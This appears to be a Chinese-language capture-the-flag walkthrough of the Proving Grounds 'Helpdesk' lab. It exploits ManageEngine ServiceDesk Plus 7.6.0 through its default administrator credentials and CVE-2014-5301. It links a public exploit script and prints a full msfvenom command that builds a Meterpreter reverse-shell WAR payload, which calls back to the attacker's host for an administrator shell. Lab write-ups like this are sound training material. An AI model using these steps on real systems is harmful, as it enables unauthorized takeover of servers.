Proving Grounds Practice : Helpdesk Walkthrough
Proving Grounds Practice : Helpdesk Walkthrough
Foothole (立足點 ) :
- 發現
ManageEngine ServiceDesk Plus 7.6.0,枚舉後利用上傳 Java
Payload
- 建立
payload 後執行 pythone code 成功
- Python
code 是 google 去 github 找的不是 Exploit DB 裡面的
- https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py
PE ( 提權 ) :
- 不用 PE,進去就是管理者了
注意事項 :
- 需要有帳號密碼的驗證後上載一個 JAVA Payload 跑 reverse shell
- 這一題直接使用系統的預設的帳號密碼
- 枚舉時發現太多項,結果到底要用哪一個 Exploit 很讓人傷腦筋
Kali IP : 192.168.45.204
靶機 IP : 192.168.205.43
第一步掃 Port
nmap
8080 Apache Tomcat/Coyote JSP engine 1.1
8080 /
ManageEngine ServiceDesk Plus 7.6.0
版本資訊 ManageEngine ServiceDesk Plus 7.6.0
Google 搜尋套件預設帳號密碼 administrator:administrator
輸入帳密後可以登入
搜尋看看有沒有驗證過後的 RCE,結果也太多了吧.....
有 Metasploit 就是好事
Exploit-DB 35845 顯示是 Authenticated 看來是有點符合,CVE 是 2014-5301
Google CVE 看看有沒有可以手動用的 python code
直接使用第一個試試看
參考 : https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py
描述有寫要先用 msfvenom 建一個 Java payload,也有給範例
# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.108 LPORT=4444 -f war > shell.war
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.45.204 LPORT=4444 -f war > shell.war
PoC 也有給使用的範例,# Script usage: ./CVE-2014-5301.py HOST PORT USERNAME PASSWORD WARFILE
直接拿到 shell 了,whoami 看一下確定是管理者,結束這回合
留言
張貼留言